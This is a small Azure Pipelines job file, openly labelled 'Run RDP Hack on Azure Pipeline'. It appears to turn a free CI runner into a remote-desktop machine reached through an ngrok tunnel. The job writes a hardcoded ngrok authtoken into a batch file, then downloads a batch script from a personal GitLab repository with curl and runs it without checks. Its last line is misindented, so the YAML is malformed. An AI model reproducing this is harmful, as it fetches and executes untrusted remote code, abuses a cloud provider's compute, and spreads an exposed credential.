jobs:
- job: Windows_2019_Azure_RDP
  pool:
    vmImage: windows-latest
  steps:
   - checkout: none 
   - script: |
       echo ngrok authtoken "1pwIv9jxeZt0G2OvAGCa0xnAVK4_5kZUzQM24GNYAoXsgbfaF" > NGROK.bat
       curl -s -O https://gitlab.com/haithuongpro2711/haivps/-/raw/master/AzureNgrokAutoRegion.bat
       AzureNgrokAutoRegion.bat
     displayName: 'Run RDP Hack on Azure Pipeline'
      run: cmd /c loop.bat 
